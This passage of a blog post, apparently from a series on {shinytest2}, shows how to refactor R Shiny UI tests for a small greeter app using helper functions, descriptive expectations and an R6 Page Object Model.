&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; shiny_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinyGreeter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;AppDriver&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;new&lt;/span&gt;(shiny_app, name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; name)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_window_size&lt;/span&gt;(width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1619&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;970&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With that we can start the test-version of the app using
&lt;code&gt;app = initialise_test_app(&amp;quot;greeter&amp;quot;)&lt;/code&gt; in the first test and
&lt;code&gt;app = initialise_test_app(&amp;quot;spanish_greeter&amp;quot;)&lt;/code&gt; in the second. This
removes a few lines of code, and would make it easier to write new
tests, but the main purpose of doing this is to make the test code more
prominent.&lt;/p&gt;
&lt;p&gt;The Spanish test now looks like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app prints a Spanish greeting to the user&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: The app is open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;initialise_test_app&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;spanish_greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: a Spanish greeting is printed to the screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_values&lt;/span&gt;(output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;spanish_greeting&amp;#34;&lt;/span&gt;, screenshot_args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="make-the-user-steps-more-descriptive"&gt;Make the user steps more descriptive&lt;/h3&gt;
&lt;p&gt;What’s actually happening when the following code runs?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;First we set the value for the &lt;code&gt;input$name&lt;/code&gt; variable to be “Jumping
Rivers” and then we click on a button that has the HTML identifier
“greet”. These are quite ‘internal’ concerns. What’s really happening is
that the user is entering their username into the app (clicking the
button is part of that process).&lt;/p&gt;
&lt;p&gt;This is a really simple app, so it shouldn’t take long to work out what
the above code does here. But in more complicated apps, and when testing
more complicated workflows, the series of steps that define the user
actions can be quite extensive.&lt;/p&gt;
&lt;p&gt;Having well-defined functions that are responsible for the different
steps in a test workflow is really valuable. With these, your non-coding
colleagues will find it easier to follow the connection between what the
code is testing and how the test is defined.&lt;/p&gt;
&lt;p&gt;Even in this simple setting, it might be beneficial to introduce a
function:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;enter_username &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(app, username) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; username)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# return the app object, so that you can pipe together the actions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;invisible&lt;/span&gt;(app)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then you can rewrite the test steps:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app prints a Spanish greeting to the user&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: The app is open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;initialise_test_app&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;spanish_greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;enter_username&lt;/span&gt;(app, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: a Spanish greeting is printed to the screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_values&lt;/span&gt;(output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;spanish_greeting&amp;#34;&lt;/span&gt;, screenshot_args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Another benefit of introducing functions for commonly repeated parts of
your test actions relates to refactoring. Suppose the &lt;code&gt;input$name&lt;/code&gt;
variable was renamed in the app. With the initial two tests, to
accommodate the change in this variable name we would have had to touch
two different places in the code - one in the English test and one in
the Spanish test. Now we only have to modify a single line in
&lt;code&gt;enter_username()&lt;/code&gt;. A similar issue happens when decomposing apps into
shiny modules (because the HTML identifiers for different elements will
change with the refactoring).&lt;/p&gt;
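&lt;p&gt;As an illustration of the module case, suppose (hypothetically) that the
inputs were moved into a shiny module with the id “greeter”. Shiny namespaces
module inputs by prefixing the module id, so the identifiers would become
“greeter-name” and “greeter-greet”. A sketch of the only change the test code
would need, under that assumption:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical: the inputs now live in a shiny module with id &amp;#34;greeter&amp;#34;,
# so their identifiers gain a &amp;#34;greeter-&amp;#34; prefix
enter_username = function(app, username) {
  # backticks are needed because the namespaced id is not a syntactic R name
  app$set_inputs(`greeter-name` = username)
  app$click(&amp;#34;greeter-greet&amp;#34;)

  # return the app object, so that you can pipe together the actions
  invisible(app)
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The test cases that call &lt;code&gt;enter_username()&lt;/code&gt; would not need to be edited.&lt;/p&gt;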
&lt;h2 id="make-your-expectations-descriptive-too-"&gt;Make your expectations descriptive too …&lt;/h2&gt;
&lt;p&gt;The snapshot tests used by {shinytest2} are wonderful if you need to
compare many values at once, or you need to do visual comparison of the
contents of your app. But they can make your test cases a bit opaque. In
the above, on entering their username, two welcome messages were printed
to the screen. While each test was running, {shinytest2} compared the
observed value for a given welcome message to a previously stored
value, but that reference value is stored some distance from the
place where the test is defined. Hiding the expectations away like this
may make it hard for a new developer to see why the actions performed in
the “WHEN” steps of a test should culminate in the values observed in
the “THEN” step.&lt;/p&gt;
&lt;p&gt;{shinytest2} provides some additional methods that help extract specific
values. With these, you can use the expectation functions from
{testthat} much as you would when unit-testing functions in R.&lt;/p&gt;
&lt;p&gt;For example, we might rewrite the first test like so:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app updates user&amp;#39;s name on clicking the button&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: The app is open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;initialise_test_app&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;enter_username&lt;/span&gt;(app, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: a greeting is printed to the screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; message &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_value&lt;/span&gt;(output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(message, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Jumping Rivers!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The source code for this version of the application can be obtained from
&lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/r-shinytest2/part-3-functions/" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="the-page-object-model"&gt;The Page Object Model&lt;/h2&gt;
&lt;p&gt;The functions that were introduced above hid the details of the app away
from us. By using these functions, we don’t need to know which HTML
element or shiny variable we need to interact with or modify when
setting the username.&lt;/p&gt;
&lt;p&gt;A pattern called the &lt;a href="https://martinfowler.com/bliki/PageObject.html" rel="external"&gt;“Page Object Model”
(POM)&lt;/a&gt; takes this idea
of hiding an app’s internal details away from the test author even
further. The POM is common in UI-based end-to-end testing in other
languages. Here, a class is defined that contains methods for
interacting with the app (but does not contain any code to perform test
expectations). The test code calls methods provided by the POM, so that
the test code is more concise and descriptive. A neat way to achieve
this design in R is to use R6 classes. Here, we might have a class
that has a method for opening the app, and a method &lt;code&gt;enter_username&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;AppDriver&lt;/code&gt; class provided by {shinytest2} is an R6 class. It
provides a lot of methods that we used above (&lt;code&gt;expect_values&lt;/code&gt;,
&lt;code&gt;get_value&lt;/code&gt;) for interacting with the app. So by now, you have some
experience of using an R6 object. We can inherit from the &lt;code&gt;AppDriver&lt;/code&gt;
class to create a POM that is specific for our app as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;GreeterApp &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; R6&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;R6Class&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;GreeterApp&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Alternatively you could pass an AppDriver in at initiation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; inherit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;AppDriver,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; public &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1619&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;970&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; initialize &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(name) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; shiny_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinyGreeter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; super&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;initialize&lt;/span&gt;(shiny_app, name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; name)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; self&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_window_size&lt;/span&gt;(width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; self&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;width, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; self&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;height)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; enter_username &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(username) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; self&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; username)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; self&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;invisible&lt;/span&gt;(self)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With that class in place, we can rewrite our original test as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app updates user&amp;#39;s name on clicking the button&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: The app is open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; GreeterApp&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;new&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;enter_username&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: a greeting is printed to the screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; message &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_value&lt;/span&gt;(output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(message, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Jumping Rivers!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Putting all this design work into setting up your tests might seem like a
lot of unnecessary effort. But it makes it easier to add new tests,
simpler to keep your tests passing as you refactor your app,
and easier to follow what each test is doing.&lt;/p&gt;
&lt;p&gt;If your tests hinder your ability to add new features to your app, or
prevent you from restructuring your app, it may be worth restructuring
your test code.&lt;/p&gt;
&lt;p&gt;The source code for the application in its current form can be obtained
from
&lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/r-shinytest2/part-3-pageobject/" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
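&lt;p&gt;The comment in the class definition above mentions an alternative to
inheritance: passing an &lt;code&gt;AppDriver&lt;/code&gt; in when the page object is created.
A minimal sketch of that variant follows. The class name &lt;code&gt;GreeterPage&lt;/code&gt;,
its &lt;code&gt;driver&lt;/code&gt; field and the &lt;code&gt;get_greeting()&lt;/code&gt; method are hypothetical
names chosen for illustration; they are not part of {shinytest2} or of the
accompanying source code.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical page object that wraps (rather than inherits from) an AppDriver
GreeterPage = R6::R6Class(
  &amp;#34;GreeterPage&amp;#34;,
  public = list(
    # The AppDriver that this page object delegates to
    driver = NULL,
    initialize = function(driver) {
      self$driver = driver
    },
    enter_username = function(username) {
      self$driver$set_inputs(name = username)
      self$driver$click(&amp;#34;greet&amp;#34;)

      invisible(self)
    },
    # Returns the rendered greeting; the expectation stays in the test
    get_greeting = function() {
      self$driver$get_value(output = &amp;#34;greeting&amp;#34;)
    }
  )
)

test_that(&amp;#34;the greeter app updates user&amp;#39;s name on clicking the button&amp;#34;, {
  # GIVEN: The app is open
  driver = shinytest2::AppDriver$new(shinyGreeter::run(), name = &amp;#34;greeter&amp;#34;)
  page = GreeterPage$new(driver)

  # WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button
  page$enter_username(&amp;#34;Jumping Rivers&amp;#34;)

  # THEN: a greeting is printed to the screen
  expect_equal(page$get_greeting(), &amp;#34;Hello Jumping Rivers!&amp;#34;)
})
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With this design the test only sees the methods that the page object
chooses to expose, at the cost of having to forward any &lt;code&gt;AppDriver&lt;/code&gt;
method that is still needed.&lt;/p&gt;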
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;This blog series was a brief introduction to UI-based end-to-end tests
